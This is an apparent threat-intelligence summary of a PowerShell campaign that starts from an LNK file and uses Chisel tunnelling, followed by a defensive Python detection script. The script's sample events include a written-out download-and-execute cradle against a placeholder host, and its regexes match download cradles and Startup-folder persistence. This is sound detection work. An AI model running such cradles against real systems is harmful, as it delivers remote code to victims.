Summary:
Cyble Research and Intelligence Lab (CRIL) has uncovered a sophisticated multi-stage infection campaign utilizing PowerShell scripts initiated by a malicious LNK file. The attack employs layered techniques to establish persistence, evade detection, and maintain communication with a command-and-control (C&C) server, ultimately enabling lateral movement within compromised networks.
Key points:
CRIL identified a multi-stage infection campaign using PowerShell.
The attack begins with a malicious LNK file that triggers a PowerShell script.
The first-stage script establishes persistence and downloads additional scripts.
The second-stage script maintains communication with the C&C server.
The third-stage script executes commands received from the C&C server.
A Chisel DLL was found, indicating potential use for lateral movement.
The threat actor (TA) likely uses a Netskope proxy for C&C communication.
The campaign employs obfuscation techniques to evade detection.
Recommendations include deploying EDR solutions and training users on phishing awareness.
MITRE Techniques:
Initial Access (TA0027): Phishing (T1660): The campaign starts with a suspicious LNK file that executes a PowerShell script. The script downloads and runs malicious payloads from the C2 server.
Execution (TA0041): Command and Scripting Interpreter: PowerShell (T1059.001): The PowerShell script executes and downloads additional malicious payloads from a remote server.
Persistence (TA0028): Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001): A batch file is dropped in the Startup folder.
Defense Evasion (TA0030): Obfuscated Files or Information (T1027): Use of obfuscated PowerShell scripts and tunneling tools to hide activity from traditional security mechanisms.
Command and Control (TA0037): Application Layer Protocol: Web Protocols (HTTP/S) (T1071.001): Chisel is used to create a tunnel to the C2 server, allowing further control over the infected system.
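A defender-side correlation of the stages listed above, added here as an example and not code from the CRIL report: it scans constructed Sysmon-style process and file events and flags any PowerShell process that shows at least two markers of the chain (an explorer.exe parent with a hidden or -nop launch, a download cradle in the command line, a .bat written to the user's Startup folder). The explorer.exe parent as the artefact of an LNK double-click, the event field names and all sample values are assumptions.

```python
"""Correlate LNK -> PowerShell -> Startup .bat markers over constructed endpoint telemetry."""
import re
from collections import defaultdict

# Marker patterns. A hidden/-nop launch and a download cradle are typical of a
# stage-1 script started from an LNK; a .bat in the Startup folder is the persistence step.
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b|-ep\s+bypass", re.I)
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
STARTUP_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.bat$", re.I)

# Constructed sample events (not taken from the report). WS01 models the described chain,
# WS02 is a benign administrative PowerShell run used as a negative case.
EVENTS = [
    {"type": "process", "host": "WS01", "pid": 4120, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient)"
                ".DownloadString('https://placeholder.invalid/stage2.ps1')"},
    {"type": "file", "host": "WS01", "pid": 4120,
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stage1.bat"},
    {"type": "process", "host": "WS02", "pid": 5000, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"type": "file", "host": "WS02", "pid": 5000, "path": r"C:\Temp\inventory.csv"},
]


def score_events(events):
    """Return {(host, pid): sorted markers} for PowerShell processes matching >= 2 markers."""
    markers = defaultdict(set)
    for ev in events:
        key = (ev["host"], ev["pid"])
        if ev["type"] == "process" and ev["image"].lower() == "powershell.exe":
            # explorer.exe as parent is how a user double-clicking an LNK shows up (assumption)
            if ev["parent"].lower() == "explorer.exe" and HIDDEN_RE.search(ev["cmdline"]):
                markers[key].add("explorer_spawned_hidden_powershell")
            if DOWNLOAD_RE.search(ev["cmdline"]):
                markers[key].add("download_cradle")
        elif ev["type"] == "file" and STARTUP_RE.search(ev["path"]):
            # file event is attributed to the writing process via (host, pid)
            markers[key].add("bat_in_startup_folder")
    return {k: sorted(v) for k, v in markers.items() if len(v) >= 2}


if __name__ == "__main__":
    for (host, pid), hits in score_events(EVENTS).items():
        print(f"{host} pid={pid}: {', '.join(hits)}")
```

Requiring two markers keeps a lone hidden-window launch or a lone Startup-folder write from paging an analyst on its own.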
IoC:
Full Research: https://cyble.com/blog/dissecting-a-multi-stage-powershell-campaign-using-chisel/